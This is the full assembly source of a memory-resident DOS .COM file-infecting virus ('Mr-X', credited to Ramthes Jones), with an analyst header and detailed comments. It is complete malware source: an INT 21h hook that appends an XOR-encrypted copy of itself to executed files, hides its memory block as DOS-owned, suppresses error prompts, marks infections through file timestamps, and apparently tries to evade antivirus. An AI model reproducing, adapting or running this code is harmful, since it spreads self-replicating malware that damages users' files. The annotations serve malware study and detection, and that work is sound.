;******************************************************************************
;******************************************************************************
;**** Virus: .COM /noTBAV ****
;**** By: Ramthes Jones ****
;******************************************************************************
;**** Analyst note (archive copy, kept verbatim for study; do not assemble
;**** or run outside an isolated DOS VM).  Syntax is MASM/TASM, not NASM.
;**** Behaviour visible in this listing: memory-resident INT 21h hook that
;**** infects any non-"MZ" file passed to EXEC (AX=4B00h) by appending the
;**** DELTA-byte body and writing a 3-byte JMP at offset 0; the body from
;**** BEGIN to TWO is XOR-encrypted with a key taken from the clock.
;**** Indicators: file time with seconds == 26 (marker), residency probe
;**** AX=0ACACh answered with AX=0CACAh, a 60h-paragraph block whose MCB
;**** owner is 0008h, INT 24h temporarily pointed at a handler that
;**** returns AL=0.  "noTBAV" and the ATBV label hint at a ThunderByte AV
;**** evasion attempt, which cannot be verified from the code alone.
;******************************************************************************
; Single flat segment: a DOS .COM image loaded at CS:0100h with
; CS = DS = ES = SS.  Assembler syntax is MASM/TASM (SEGMENT/ASSUME/
; OFFSET/DUP/PROC), not NASM.
CODE SEGMENT
ASSUME CS:CODE, DS:CODE, ES:CODE, SS:CODE
ORG 0100h

; Size in bytes of the virus body proper, ONE..TWO.  This is the amount
; appended to every infected .COM and copied into the resident segment;
; the carrier stub in front of ONE is never propagated.
DELTA EQU (TWO - ONE)
START:
; Entry point of the first-generation carrier.  Control goes to the virus
; body first.  NORMAL holds three NOPs in this generation, so when RUN_COM
; copies NORMAL over the JMP at 100h and returns to 100h, execution falls
; through into the stub below.
JMP VIR_START
NOP
; Carrier payload: print MSG via DOS "write string" (AH=09h, DS:DX points
; at '$'-terminated text) and terminate with INT 20h.
MOV AH,09h
MOV DX,OFFSET MSG
PUSH CS
POP DS
INT 21h

INT 20h

; MSG (Spanish): "Mr-X virus activated!!!  Please do not run any file.
; Heh, heh, heh..."  Only the carrier carries this text; infected hosts
; receive nothing before ONE.
MSG DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'
VIR_START:
; ONE marks the first byte of the virus body.  In an infected file it sits
; at host_size + 100h; in the resident copy it is offset 0, which is why
; every later data reference is written as (X - OFFSET ONE).
ONE LABEL BYTE
; BX = address of ONE in the current image.  015Dh is the author's
; generation-1 value; INFECT_COM patches the two immediate bytes (body
; offsets 1-2) with host_size + 100h in each new copy.  The value is also
; pushed here and popped again by RUN_COM.
MOV BX,015Dh
PUSH BX
; Decryption window: from the byte before BEGIN (the 21h of the INT 21h at
; ATBV) up to TWO.  Must match the ENCRIPTO loop in the infector.
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1 ; known at assembly time
ADD SI,BX
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1 ; known at assembly time
MOV DX,0FFCDh ; CD FF little-endian = the two bytes of INT 0FFh
; Interrupts stay off for the whole self-modifying loop.
CLI
BUCLE:
MOV AH,[SI]
; XOR key.  The 00h immediate (body offset 20) is overwritten by the
; infector with DL from INT 21h/2Ch (hundredths of a second), so this
; generation-1 image is effectively stored in clear.
XOR AH,00h
; Six NOPs; no purpose stated by the author (padding ahead of the write
; below is the only thing they visibly do).
DB 06 DUP (90h)
; Writes INT 0FFh over the MOV [SI],AH at INTFFh (body offset 30) just
; before that instruction runs; the instruction after it restores the
; original encoding.  Apparently an anti-trace trick: a CPU that already
; prefetched the MOV executes it unchanged, while a single-stepping
; debugger or an emulator that re-fetches sees INT 0FFh instead.
MOV [bx+30],DX

INTFFh LABEL WORD
MOV [SI],AH
MOV [bx+30],2488h ; 88 24 = MOV [SI],AH: put the clobbered opcode back
INC SI
LOOP BUCLE

STI
JMP ATBV
JODER:
; Dead code: terminate via DOS AH=4Ch.  Nothing in this listing jumps
; here.
MOV AH,4Ch
INT 21h
ATBV:
; INT 21h/30h (get DOS version).  The result is never used; the label
; name suggests a heuristic-scanner decoy (the banner says "noTBAV"), but
; that cannot be verified here.  The 21h byte of this INT is BEGIN-1, the
; first encrypted byte, so infected copies store it as INT (21h XOR key).
MOV AH,30h
INT 21h
BEGIN:
; First byte of the region that ENCRIPTO encrypts in infected copies
; (the window runs through the end of the data at TWO).
; Residency handshake: the INT 21h hook answers AX=0CACAh to AX=0ACACh
; (see GIVE_MARK).  Already resident -> just run the host; otherwise go
; resident first.
MOV AX,0ACACh
INT 21h
CMP AX,0CACAh
JE RUN_COM
JMP STAY_IN_MEMO
RUN_COM:
; Hand control to the host.  Sets DS = ES = CS and pops BX = address of
; ONE (pushed at VIR_START).  The three original host bytes saved in
; NORMAL are copied back over the entry JMP at CS:0100h, then a far
; return to CS:0100h starts the host.  (PUSH imm16 is an 80186+
; instruction, so this will not run on an 8086/8088.)
PUSH CS
PUSH CS
POP DS
POP ES
POP BX
MOV DI,100h
LEA SI,[(NORMAL - OFFSET ONE) + BX]
MOVSW
MOVSB
PUSH CS
PUSH 0100h
RETF
STAY_IN_MEMO:
; Go resident.  The first two INT 21h/4Ah (resize block) calls use
; impossible sizes (0 and 0FFFFh); on failure DOS returns in BX the
; largest size the block can take.  The program's own block is then cut
; back by 61h paragraphs so that the 60h-paragraph allocation below
; lands in the freed space at the top of conventional memory.  None of
; the calls test CF.
MOV AH,4Ah
XOR BX,BX
INT 21h

MOV AH,4Ah
MOV BX,0FFFFh
INT 21h

SUB BX,61h ;101h
MOV AH,4Ah
INT 21h

; Allocate 60h paragraphs (1536 bytes) for the resident copy.  There is
; no check that DELTA fits in it.
MOV AH,48h
MOV BX,60h ;100h
INT 21h

; Mark the new block as owned by PSP 0008h (the owner value DOS uses for
; its own memory) by writing offset 1 of the memory control block, which
; sits one paragraph below the allocated segment.  This keeps the block
; from being released when the host terminates and makes it look like
; system memory in memory listings.
MOV ES,AX
PUSH ES
DEC AX
MOV ES,AX
MOV ES:WORD PTR [0001h], 0008h
POP ES

; Copy the body (ONE..TWO, DELTA bytes) to offset 0 of the new segment.
PUSH CS
POP DS

POP SI ; SI = address of ONE; the value stays on the stack for RUN_COM
PUSH SI
XOR DI,DI
MOV CX,DELTA
CLD
REP MOVSB

PUSH ES
POP DS

; Save the current INT 21h vector inside the resident copy (DS = new
; segment) and point INT 21h at HOOK_21 in that segment.
MOV AX,3521h
INT 21h
POP SI
PUSH SI
MOV DS:[INT21IP - OFFSET ONE],BX
MOV DS:[INT21CS - OFFSET ONE],ES

MOV AX,2521h
MOV DX,(OFFSET HOOK_21 - OFFSET ONE)
INT 21h
JMP RUN_COM
HOOK_21 PROC FAR
; Resident INT 21h handler.  Runs on the caller's SS:SP with the IRET
; frame already on the stack.  Saves flags and every general register,
; then dispatches on AX:
;   4B00h  (EXEC, load and execute)  -> INFECT_COM, then chain to DOS
;   0ACACh (residency probe)         -> GIVE_MARK, answers AX=0CACAh
;   anything else                    -> chain to the saved vector (FIN)
; Data references are CS-relative offsets from ONE because the resident
; copy starts at segment offset 0.  "PUSHF + CALL DWORD PTR [INT21IP]"
; invokes the original DOS handler without re-entering this hook.
PUSH DS
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES

CMP AX,4B00h
JE INFECT_COM
CMP AX,0ACACh
JE GIVE_MARK
JMP FIN

GIVE_MARK:
; Residency reply: restore everything and return AX=0CACAh to the prober
; without calling the original INT 21h.
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
MOV AX,0CACAh
IRET

INFECT_COM:
; Infect the file about to be executed; DS:DX = the caller's path.
; Step 1: save the current INT 24h (critical-error) vector and replace
; it with HOOK_24 so disk errors during infection are silently ignored.
PUSH AX
PUSH BX
PUSH DX
PUSH DS
PUSH ES

MOV AX, CS
MOV DS, AX
MOV AX,3524h
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
MOV DS:[INT24IP - OFFSET ONE],BX
MOV DS:[INT24CS - OFFSET ONE],ES

MOV AX,2524h
MOV DX,(OFFSET HOOK_24 - OFFSET ONE)
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
POP ES
POP DS
POP DX
POP BX
POP AX

; Keep the path offset for the attribute restore at FINAL.
PUSH DX

; Step 2: read the file attributes (4300h), keep them in ATRIBUTOS and
; force 20h (archive only) so read-only/hidden/system files can be
; opened for writing.  On failure skip to FINAL_1 (DS is still the
; caller's on that path).
MOV AX,4300h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX

MOV AX,4301h
MOV CX,20h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL_1

; Step 3: open read/write.  No CF check: on failure the error code in AX
; is used as the handle for everything that follows.
MOV AX,3D02h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
PUSH AX
POP BX

; Step 4: read the first two bytes into NORMAL (DS = CS from here on).
MOV AH,3Fh
MOV CX,2
PUSH CS
POP DS
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]

; Skip files that start with "MZ" (EXE header); anything else that DOS
; EXECs is treated as a .COM, with no check of extension or of whether
; size + DELTA still fits the 64K .COM limit.
XOR SI,SI
mov ax,cs:(normal - offset one)[si]
cmp ax,'ZM'
je final_1
jmp conti

FINAL_1:
JMP FINAL

CONTI:
; Step 5: read the file's date/time (5700h).  DOS stores seconds/2 in the
; low 5 bits of the time word; a value of 13 (26 s) is the "already
; infected" marker.
MOV AX,5700h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(HORA - OFFSET ONE)],CX
MOV CS:[(FECHA - OFFSET ONE)],DX

AND CL,00011111b ; keep the seconds/2 field
CMP CL,00001101b ; 13 -> 26 seconds: already infected, leave it alone
JE FINAL_1

; Step 6: rewind and read the host's first three bytes into NORMAL.
XOR AL,AL
CALL F_42h

MOV AH,3Fh
MOV CX,3
PUSH CS
POP DS
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]

; Step 7: seek to end; AX = host size (the high word in DX is ignored).
; The entry JMP displacement is size - 3 (target 100h+size minus the end
; of the 3-byte JMP at 100h) and goes into BUFFER+1..2.
MOV AL,02h
CALL F_42h
PUSH AX

SUB AX,3

MOV SI,1
MOV CS:(BUFFER - OFFSET ONE)[SI],AL
INC SI
MOV CS:(BUFFER - OFFSET ONE)[SI],AH

; Step 8: allocate 150h paragraphs of scratch space and copy the body
; there.  No CF check on the allocation.
PUSH BX
MOV AH,48h
MOV BX,150h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV ES,AX
POP BX

PUSH CS
POP DS

XOR SI,SI
MOV DI,SI
MOV CX,OFFSET TWO - OFFSET ONE
CLD
REP MOVSB

PUSH ES
POP DS

; Step 9: patch the scratch copy.  Bytes 1-2 are the immediate of the
; "MOV BX,..." at ONE: host size + 100h, the load address of the body
; inside the infected host.
POP AX ; compute
INC AH ; the address at which
XOR SI,SI ; the body will start
MOV [SI + 1],AL ; inside the infected
MOV [SI + 2],AH ; file

; Byte 20 is the immediate of "XOR AH,00h" in the decryptor: the key is
; DL from INT 21h/2Ch, the hundredths-of-second field of the clock.
MOV AH,2Ch
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV [SI+20],DL

; Step 10: XOR-encrypt the copy from the byte before BEGIN to TWO (the
; same window the decryptor at VIR_START undoes).  A key of 0 leaves the
; copy in clear.
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1
ENCRIPTO:
XOR ES:[SI],DL
INC SI
LOOP ENCRIPTO

; Step 11: append the DELTA-byte copy at the end of the host (the file
; pointer is still at EOF).  On a write error jump to FINAL without
; freeing the scratch block.
MOV AH,40h
MOV CX,DELTA
XOR DX,DX
PUSH ES
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL

MOV AH,49h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]

; Step 12: overwrite the first three bytes with the JMP in BUFFER.
XOR AL,AL
CALL F_42h

MOV AH,40h
MOV CX,3
MOV DX,(OFFSET BUFFER - OFFSET ONE)
PUSH CS
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]

; Step 13: put the original date/time back with the seconds field set
; to 13 (26 s) as the infection marker.
MOV AX,5701h
MOV CX,CS:[(HORA - OFFSET ONE)]
AND CL,11100000b
OR CL,00001101b
MOV DX,CS:[(FECHA - OFFSET ONE)]
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
FINAL:
; Close the handle in BX.  On the JC FINAL_1 path from the attribute
; change the file was never opened, so this closes whatever handle the
; caller had in BX.
MOV AH,3Eh
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]

; Restore the saved attributes.  On every path except that early
; JC FINAL_1 exit, DS is CS (or the scratch segment) here rather than
; the caller's segment, so DS:DX does not address the original path and
; the host appears to be left with attribute 20h.
MOV AX,4301h
MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)]
POP DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]

; Put the original INT 24h vector back.
MOV AX,2524h
MOV DX,CS:[INT24IP - OFFSET ONE]
MOV DS,CS:[INT24CS - OFFSET ONE]
PUSHF
CALL DWORD PTR CS:[INT21IP-OFFSET ONE]

FIN:
; Restore the caller's registers and flags and chain to the saved DOS
; handler, which will IRET to the caller.
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX

POPF
POP DS
JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)]

F_42h PROC
; Seek helper: AL = origin (0 = start, 2 = end), offset CX:DX = 0.
; CWD clears DX because AX = 42xxh is non-negative; CX then copies it.
; BX must hold the file handle.  Returns DX:AX = new file position.
MOV AH,42h
CWD
MOV CX,DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
RET
F_42h ENDP

HOOK_21 ENDP
HOOK_24 PROC
; Replacement critical-error (INT 24h) handler installed for the
; duration of an infection: returns AL=0 ("ignore"), so write-protect
; and similar errors never raise the Abort/Retry/Fail prompt.
XOR AL,AL
IRET
HOOK_24 ENDP
; Resident data.  Lies inside the encrypted window (BEGIN..TWO), so in an
; infected file these bytes, including HIDDEN_MSG, are XORed with the key.
INT21IP DW 0 ; original INT 21h vector (offset, then segment)
INT21CS DW 0
INT24IP DW 0 ; original INT 24h vector, saved and restored per infection
INT24CS DW 0
INT17IP DW 0 ; not referenced anywhere in this listing
INT17CS DW 0
ATRIBUTOS DW 0 ; host's attributes before they were forced to 20h
HORA DW 0 ; host's original time word (seconds field later set to 13)
FECHA DW 0 ; host's original date word
BUFFER DB 3 DUP(0E9h) ; E9 = JMP rel16; bytes 1-2 receive (host size - 3)
NORMAL DB 3 DUP(90h) ; host's original first 3 bytes (3 NOPs in generation 1)
; Author string; usable as a detection string on in-memory copies and on
; files infected with key 0.
HIDDEN_MSG DB "Ramthes. World Cup'98: ARGENTINA!!"
; End of the virus body; DELTA = TWO - ONE.
TWO LABEL BYTE
CODE ENDS
END START